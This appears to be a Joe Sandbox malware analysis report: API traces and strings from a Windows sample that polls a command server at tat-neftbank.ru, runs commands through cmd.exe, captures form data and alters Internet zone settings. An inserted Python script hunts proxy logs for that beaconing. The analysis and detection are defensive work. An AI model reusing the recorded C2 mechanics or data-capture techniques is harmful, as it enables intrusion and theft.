                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
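The trace above is the sample's command-polling loop: it fetches http://tat-neftbank.ru/wcmd.htm, builds per-task page names with sprintf("%s/Rtdx1%i.htm", ...), stores them as %s\Rtdx1%i.dat, hands commands to cmd.exe/command.com via "%s /C %s" and WinExec, and then calls _sleep(0x1B7740), i.e. 1,800,000 ms or 30 minutes, before the next iteration. The following Python script is an added example, not part of the Joe Sandbox report or of the sample, that turns those three facts (host and command path, the Rtdx1<n>.htm naming, the 30-minute period) into a proxy-log hunt. The log line format, the sample lines and all function names are constructed for this example.

```python
"""Hunt proxy logs for the C2 pattern recorded in the sandbox trace.

Indicators taken from the report's string table:
  - http://tat-neftbank.ru/wcmd.htm       command page polled in a loop
  - sprintf("%s/Rtdx1%i.htm", ...)        per-task page on the same host
  - _sleep(0x1B7740) == 1,800,000 ms      30-minute delay between iterations
The log format and SAMPLE_LOG below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

C2_HOST = "tat-neftbank.ru"
C2_COMMAND_PATH = "/wcmd.htm"
C2_TASK_PATH = re.compile(r"^/Rtdx1\d+\.htm$")
BEACON_PERIOD = timedelta(milliseconds=0x1B7740)  # 30 minutes

# Constructed log format: "<ISO timestamp> <client> <method> <url> <status>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)

SAMPLE_LOG = """\
2024-10-28T09:00:02Z 10.0.0.17 GET http://tat-neftbank.ru/wcmd.htm 200
2024-10-28T09:00:03Z 10.0.0.17 GET http://tat-neftbank.ru/Rtdx15.htm 200
2024-10-28T09:12:44Z 10.0.0.23 GET http://example.org/index.htm 200
2024-10-28T09:30:02Z 10.0.0.17 GET http://tat-neftbank.ru/wcmd.htm 200
2024-10-28T10:00:01Z 10.0.0.17 GET http://tat-neftbank.ru/wcmd.htm 404
2024-10-28T10:05:00Z 10.0.0.23 GET http://tat-neftbank.ru/Rtdx1100.htm 200
""".splitlines()


def classify_url(url: str) -> Optional[str]:
    """Map a URL to an indicator class, or None if it is unrelated to the C2 host."""
    parts = urlsplit(url)
    if parts.hostname != C2_HOST:
        return None
    if parts.path == C2_COMMAND_PATH:
        return "c2-command-page"
    if C2_TASK_PATH.match(parts.path):
        return "c2-task-page"
    return "c2-host-other"  # same host, unknown path: still worth a look


def parse_line(line: str) -> Optional[dict]:
    """Parse one constructed-format log line; None for lines that do not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def find_hits(lines) -> List[Tuple[str, datetime, str, str]]:
    """Return (client, timestamp, url, indicator) for every C2-related request.

    A 404 still counts: the request itself is the indicator, not the response.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify_url(rec["url"])
        if kind:
            hits.append((rec["client"], rec["ts"], rec["url"], kind))
    return hits


def find_beaconing(hits, tolerance=timedelta(seconds=90)) -> Dict[str, int]:
    """Clients whose command-page polls recur at the sample's 30-minute period.

    Returns {client: number of consecutive gaps within `tolerance` of BEACON_PERIOD}.
    """
    by_client: Dict[str, List[datetime]] = defaultdict(list)
    for client, ts, _url, kind in hits:
        if kind == "c2-command-page":
            by_client[client].append(ts)
    beaconing = {}
    for client, stamps in by_client.items():
        stamps.sort()
        gaps = [later - earlier for earlier, later in zip(stamps, stamps[1:])]
        periodic = [g for g in gaps if abs(g - BEACON_PERIOD) <= tolerance]
        if periodic:
            beaconing[client] = len(periodic)
    return beaconing


if __name__ == "__main__":
    hits = find_hits(SAMPLE_LOG)
    for client, ts, url, kind in hits:
        print(ts.isoformat(), client, kind, url)
    print("beaconing:", find_beaconing(hits))
```

Matching on the exact host is deliberate: the task-page pattern Rtdx1<n>.htm is specific enough on its own to be worth a second, host-independent query in case the operator moved hosts, but that query will carry more noise and is best run separately.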
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • yes, xrefs: 0040510E
                            • BrowseNewProcess, xrefs: 00405113
                            • GlobalUserOffline, xrefs: 004050FA
                            • 1601, xrefs: 004050D4
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmp
                             • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmp
